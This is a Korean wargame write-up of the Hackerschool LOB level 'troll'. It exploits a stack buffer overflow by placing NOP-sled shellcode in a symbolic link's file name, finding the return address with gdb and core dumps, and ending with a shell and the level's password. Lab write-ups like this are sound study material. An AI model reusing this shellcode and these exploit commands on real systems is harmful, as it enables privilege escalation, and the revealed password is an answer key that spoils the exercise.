해커스쿨 LOB ( orge -> troll ) by ORANG

LOB_orge

 

[orge@localhost orge]$ bash2 [orge@localhost orge]$ ls troll  troll.c [orge@localhost orge]$ cat troll.c /*         The Lord of the BOF : The Fellowship of the BOF         - troll         - check argc + argv hunter */ #include <stdio.h> #include <stdlib.h> extern char **environ; main(int argc, char *argv[]) { char buffer[40]; int i; // here is changed if(argc != 2){ printf("argc must be two!\n"); exit(0); } // egghunter for(i=0; environ[i]; i++) memset(environ[i], 0, strlen(environ[i])); if(argv[1][47] != '\xbf') { printf("stack is still your friend.\n"); exit(0); } // check the length of argument if(strlen(argv[1]) > 48){ printf("argument is too long!\n"); exit(0); } strcpy(buffer, argv[1]); printf("%s\n", buffer);         // buffer hunter         memset(buffer, 0, 40); // one more! memset(argv[1], 0, strlen(argv[1])); }

 

bash2 띄우고~~ 힌트부터 보겠습니다.

음 에그헌터, 버퍼헌터, argv[1]헌터?에다가 argc도 2로 고정해줘야 하네요

그동안 argv[2]를 써먹느라 편했는데.. 다른 방법을 찾아봐야할 것 같습니다. 

 

 

프로세스 메모리 구조를 보면 Stack 영역에 argc, argv, env, etc가 포함되는걸 알 수 있습니다. 하지만 이 문제에선 env, argv 둘 다 초기화가 되는데요.. gdb로 분석해보며 etc 부분을 살펴보겠습니다.

 

(gdb) disas main Dump of assembler code for function main: 0x8048500 <main>: push   %ebp 0x8048501 <main+1>: mov    %esp,%ebp 0x8048503 <main+3>: sub    $0x2c,%esp …생략… 0x804863a <main+314>: add    $0xc,%esp 0x804863d <main+317>: leave 0x804863e <main+318>: ret

 

사용자 주소 공간은 0x08048000 ~ 0xBFFFFFFF 이므로 0xBFFFFFFF부터 위로 찾아보겠습니다.

main+3에 브레이크 포인트를 걸고 확인해보겠습니다.

 

(gdb) b * main+3 Breakpoint 1 at 0x8048503 (gdb) r AAAA Starting program: /home/orge/tmp/./troll AAAA Breakpoint 1, 0x8048503 in main () (gdb) x/200x 0xbfffffff-500 0xbffffe0b: 0x6d6f682f 0x726f2f65 0x742f6567 0x5300706d 0xbffffe1b: 0x4c564c48 0x4c00323d 0x4f435f53 0x53524f4c 0xbffffe2b: 0x3d6f6e3d 0x663a3030 0x30303d69 0x3d69643a 0xbffffe3b: 0x333b3130 0x6e6c3a34 0x3b31303d 0x703a3633 0xbffffe4b: 0x30343d69 0x3a33333b 0x303d6f73 0x35333b31 0xbffffe5b: 0x3d64623a 0x333b3034 0x31303b33 0x3d64633a 0xbffffe6b: 0x333b3034 0x31303b33 0x3d726f3a 0x303b3130 0xbffffe7b: 0x37333b35 0x3a31343b 0x303d696d 0x35303b31 0xbffffe8b: 0x3b37333b 0x653a3134 0x31303d78 0x3a32333b 0xbffffe9b: 0x6d632e2a 0x31303d64 0x3a32333b 0x78652e2a 0xbffffeab: 0x31303d65 0x3a32333b 0x6f632e2a 0x31303d6d 0xbffffebb: 0x3a32333b 0x74622e2a 0x31303d6d 0x3a32333b 0xbffffecb: 0x61622e2a 0x31303d74 0x3a32333b 0x68732e2a 0xbffffedb: 0x3b31303d 0x2a3a3233 0x6873632e 0x3b31303d 0xbffffeeb: 0x2a3a3233 0x7261742e 0x3b31303d 0x2a3a3133 0xbffffefb: 0x7a67742e 0x3b31303d 0x2a3a3133 0x6a72612e 0xbfffff0b: 0x3b31303d 0x2a3a3133 0x7a61742e 0x3b31303d 0xbfffff1b: 0x2a3a3133 0x687a6c2e 0x3b31303d 0x2a3a3133 0xbfffff2b: 0x70697a2e 0x3b31303d 0x2a3a3133 0x303d7a2e 0xbfffff3b: 0x31333b31 0x5a2e2a3a 0x3b31303d 0x2a3a3133 0xbfffff4b: 0x3d7a672e 0x333b3130 0x2e2a3a31 0x3d327a62 0xbfffff5b: 0x333b3130 0x2e2a3a31 0x303d7a62 0x31333b31 0xbfffff6b: 0x742e2a3a 0x31303d7a 0x3a31333b 0x70722e2a 0xbfffff7b: 0x31303d6d 0x3a31333b 0x70632e2a 0x303d6f69 0xbfffff8b: 0x31333b31 0x6a2e2a3a 0x303d6770 0x35333b31 0xbfffff9b: 0x672e2a3a 0x303d6669 0x35333b31 0x622e2a3a 0xbfffffab: 0x303d706d 0x35333b31 0x782e2a3a 0x303d6d62 0xbfffffbb: 0x35333b31 0x782e2a3a 0x303d6d70 0x35333b31 0xbfffffcb: 0x702e2a3a 0x303d676e 0x35333b31 0x742e2a3a 0xbfffffdb: 0x303d6669 0x35333b31 0x682f003a 0x2f656d6f 0xbfffffeb: 0x6567726f 0x706d742f 0x742f2e2f 0x6c6c6f72 0xbffffffb: 0x00000000 Cannot access memory at address 0xbfffffff

사용자 주소 공간 끝 직전까지 빽빽히 뭔가 차있네요 내용을 보겠습니다.

(gdb) x/100s 0xbfffffff-1000 0xbffffc17:  "" 0xbffffc18:  "" 0xbffffc19:  "" 0xbffffc1a:  "" 0xbffffc1b:  "" 0xbffffc1c:  "" 0xbffffc1d:  "" 0xbffffc1e:  "i686" 0xbffffc23:  "/home/orge/tmp/./troll" 0xbffffc3a:  "AAAA" 0xbffffc3f:  "LESSOPEN=|/usr/bin/lesspipe.sh %s" 0xbffffc61:  "USERNAME=" 0xbffffc6b:  "HISTSIZE=1000" 0xbffffc79:  "HOSTNAME=localhost.localdomain" 0xbffffc98:  "LOGNAME=orge" 0xbffffca5:  "MAIL=/var/spool/mail/orge" 0xbffffcbf:  "MACHTYPE=i386-redhat-linux-gnu" 0xbffffcde:  "TERM=xterm-color" 0xbffffcef:  "HOSTTYPE=i386" 0xbffffcfd:  "PATH=/bin:/usr/bin:/usr/local/bin:/usr/bin/X11:/usr/X11R6/bin:/home/orge/bin" 0xbffffd4a:  "OLDPWD=/home/orge" 0xbffffd5c:  "HOME=/home/orge" 0xbffffd6c:  "INPUTRC=/etc/inputrc" 0xbffffd81:  "SHELL=/bin/bash" 0xbffffd91:  "USER=orge" 0xbffffd9b:  "BASH_ENV=/home/orge/.bashrc" 0xbffffdb7:  "DISPLAY=/tmp/launch-SS2sdZ/org.macosforge.xquartz:0" 0xbffffdeb:  "LANG=en_US" 0xbffffdf6:  "OSTYPE=linux-gnu" 0xbffffe07:  "PWD=/home/orge/tmp" 0xbffffe1a:  "SHLVL=2" 0xbffffe22:  "LS_COLORS=no=00:fi=00:di=01;34:ln=01;36:pi=40;33:so=01;35:bd=40;33;01:cd=40;33;01:or=01;05;37;41:mi=01;05;37;41:ex=01;32:*.cmd=01;32:*.exe=01;32:*.com=01;32:*.btm=01;32:*.bat=01;32:*.sh=01;32:*.csh=01"... 0xbffffeea:  ";32:*.tar=01;31:*.tgz=01;31:*.arj=01;31:*.taz=01;31:*.lzh=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.gz=01;31:*.bz2=01;31:*.bz=01;31:*.tz=01;31:*.rpm=01;31:*.cpio=01;31:*.jpg=01;35:*.gif=01;35:*.bmp=01;3"... ---Type <return> to continue, or q <return> to quit--- 0xbfffffb2:  "5:*.xbm=01;35:*.xpm=01;35:*.png=01;35:*.tif=01;35:" 0xbfffffe5:  "/home/orge/tmp/./troll" 0xbffffffc:  "" 0xbffffffd:  "" 0xbffffffe:  "" 0xbfffffff:  "" 0xc0000000:  <Address 0xc0000000 out of bounds> 0xc0000000:  <Address 0xc0000000 out of bounds> 0xc0000000:  <Address 0xc0000000 out of bounds>

 

환경 변수와, 실행 파일명(명령어)의 이름도 포함되어 있네요. 앞쪽에 브레이크 포인트를 걸었기 때문에 아직 환경변수가 초기화되지 않은 것 같습니다.

main+317에 브레이크 포인트를 걸어주고 다시 확인해보면…

 

(gdb) b * main+317 Breakpoint 2 at 0x804863d (gdb) r `perl -e 'print "A"x44,"BBB\xbf"'` Starting program: /home/orge/tmp/./troll `perl -e 'print "A"x44,"BBB\xbf"'` Breakpoint 1, 0x8048503 in main () (gdb) n Single stepping until exit from function main, which has no line number information. AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBB Breakpoint 2, 0x804863d in main () (gdb) x/200s 0xbfffffff-200 …생략… 0xbfffffdf:  "" 0xbfffffe0:  "" 0xbfffffe1:  "" 0xbfffffe2:  "" 0xbfffffe3:  "" 0xbfffffe4:  "" 0xbfffffe5:  "/home/orge/tmp/./troll" 0xbffffffc:  "" 0xbffffffd:  "" 0xbffffffe:  "" 0xbfffffff:  "" 0xc0000000:  <Address 0xc0000000 out of bounds> 0xc0000000:  <Address 0xc0000000 out of bounds> 0xc0000000:  <Address 0xc0000000 out of bounds>

 

어? 남아있는 부분이 있네요. 명령어 부분이 남아있습니다!!

이 부분을 통해 공격하면 되겠네요, 이전 단계 문제에서 풀었던 심볼릭 링크를 이용하겠습니다.

 

…실수로 troll 파일을 날려버려서 LOB vm 재설정 후 이어서 씁니다…ㅠㅠ

 

[orge@localhost tmp]$ ln -s troll `perl -e 'print "AA","\x90"x100,"\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'` ln: cannot create symbolic link `AA11̀E1F̀1Ph//shh/binPS°      ̀' to `troll': No such file or directory 링크를 걸어주려 했는데, 제대로 되지 않네요. 찾아보니 셸코드의 ‘\x2f’ 때문이었습니다. ‘\x2f’가 ‘/‘로 인식되기 때문입니다.. 따라서 ‘\x2f’가 없는 셸코드를 이용해 다시 시도해 보겠습니다. [orge@localhost tmp]$ ln -s troll `perl -e 'print "AA","\x90"x100,"\xd9\xc5\xd9\x74\x24\xf4\xb8\x15\xc3\x69\xd7\x5d\x29\xc9\xb1\x0b\x31\x45\x1a\x03\x45\x1a\x83\xc5\x04\xe2\xe0\xa9\x62\x8f\x93\x7c\x13\x47\x8e\xe3\x52\x70\xb8\xcc\x17\x17\x38\x7b\xf7\x85\x51\x15\x8e\xa9\xf3\x01\x98\x2d\xf3\xd1\xb6\x4f\x9a\xbf\xe7\xfc\x34\x40\xaf\x51\x4d\xa1\x82\xd6"'` [orge@localhost tmp]$ ls AA????????????????????????????????????????????????????????????????????????????????????????????????????t$?i])ɱ?1E??E???b??|?G?Rp??8{?Q????-ѶO?4@QM? troll

 

이번엔 링크가 성공적으로 걸렸습니다!!

음 일단 주소를 모르니 세그먼트폴트를 유도해 코어 덤프를 보겠습니다.

 

[orge@localhost tmp]$ ./`perl -e 'print "AA", "\x90"x100, "\xd9\xc5\xd9\x74\x24\xf4\xb8\x15\xc3\x69\xd7\x5d\x29\xc9\xb1\x0b\x31\x45\x1a\x03\x45\x1a\x83\xc5\x04\xe2\xe0\xa9\x62\x8f\x93\x7c\x13\x47\x8e\xe3\x52\x70\xb8\xcc\x17\x17\x38\x7b\xf7\x85\x51\x15\x8e\xa9\xf3\x01\x98\x2d\xf3\xd1\xb6\x4f\x9a\xbf\xe7\xfc\x34\x40\xaf\x51\x4d\xa1\x82\xd6"'` `perl -e 'print "A"x44,"BBB\xbf"'` AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBB Segmentation fault (core dumped)   (gdb) x/200x 0xbfffffff-200 0xbfffff37: 0x00000000 0x00000000 0x00000000 0x00000000 0xbfffff47: 0x00000000 0x2f2e0000 0x90904141 0x90909090 0xbfffff57: 0x90909090 0x90909090 0x90909090 0x90909090 0xbfffff67: 0x90909090 0x90909090 0x90909090 0x90909090 0xbfffff77: 0x90909090 0x90909090 0x90909090 0x90909090 0xbfffff87: 0x90909090 0x90909090 0x90909090 0x90909090 0xbfffff97: 0x90909090 0x90909090 0x90909090 0x90909090 0xbfffffa7: 0x90909090 0x90909090 0x90909090 0xc5d99090 0xbfffffb7: 0xf42474d9 0x69c315b8 0xc9295dd7 0x45310bb1 0xbfffffc7: 0x1a45031a 0xe204c583 0x8f62a9e0 0x47137c93 0xbfffffd7: 0x7052e38e 0x1717ccb8 0x85f77b38 0xa98e1551 0xbfffffe7: 0x2d9801f3 0x4fb6d1f3 0xfce7bf9a 0x51af4034 0xbffffff7: 0xd682a14d 0x00000000 Cannot access memory at address

 

넉넉하게 0xbfffff67쯤으로 공격해보겠습니다~~

 

[orge@localhost tmp]$ ./`perl -e 'print "AA", "\x90"x100, "\xd9\xc5\xd9\x74\x24\xf4\xb8\x15\xc3\x69\xd7\x5d\x29\xc9\xb1\x0b\x31\x45\x1a\x03\x45\x1a\x83\xc5\x04\xe2\xe0\xa9\x62\x8f\x93\x7c\x13\x47\x8e\xe3\x52\x70\xb8\xcc\x17\x17\x38\x7b\xf7\x85\x51\x15\x8e\xa9\xf3\x01\x98\x2d\xf3\xd1\xb6\x4f\x9a\xbf\xe7\xfc\x34\x40\xaf\x51\x4d\xa1\x82\xd6"'` `perl -e 'print "A"x44,"\x67\xff\xff\xbf"'` AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAg bash$ id uid=507(orge) gid=507(orge) groups=507(orge) bash$ exit exit [orge@localhost tmp]$ cd .. [orge@localhost orge]$ ln -s troll `perl -e 'print "AA", "\x90"x100, “\xd9\xc5\xd9\x74\x24\xf4\xb8\x15\xc3\x69\xd7\x5d\x29\xc9\xb1\x0b\x31\x45\x1a\x03\x45\x1a\x83\xc5\x04\xe2\xe0\xa9\x62\x8f\x93\x7c\x13\x47\x8e\xe3\x52\x70\xb8\xcc\x17\x17\x38\x7b\xf7\x85\x51\x15\x8e\xa9\xf3\x01\x98\x2d\xf3\xd1\xb6\x4f\x9a\xbf\xe7\xfc\x34\x40\xaf\x51\x4d\xa1\x82\xd6"'` [orge@localhost orge]$ ls AA????????????????????????????????????????????????????????????????????????????????????????????????????t$?i])ɱ?1E??E???b??|?G?Rp??8{?Q????-ѶO?4@QM? tmp troll troll.c [orge@localhost orge]$ ./`perl -e 'print "AA","\x90"x100,"\xd9\xc5\xd9\x74\x24\xf4\xb8\x15\xc3\x69\xd7\x5d\x29\xc9\xb1\x0b\x31\x45\x1a\x03\x45\x1a\x83\xc5\x04\xe2\xe0\xa9\x62\x8f\x93\x7c\x13\x47\x8e\xe3\x52\x70\xb8\xcc\x17\x17\x38\x7b\xf7\x85\x51\x15\x8e\xa9\xf3\x01\x98\x2d\xf3\xd1\xb6\x4f\x9a\xbf\xe7\xfc\x34\x40\xaf\x51\x4d\xa1\x82\xd6"'` `perl -e 'print "A"x44,"\x67\xff\xff\xbf"'` AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAg bash$ id uid=507(orge) gid=507(orge) euid=508(troll) egid=508(troll) groups=507(orge) bash$ my-pass euid = 508 aspirin

 

중간에 troll 파일을 지워버린것과 셸코드 관련 문제에서 너무 삽질을 해버렸네요ㅠㅠ

역시 vm스냅샷은 필수..!!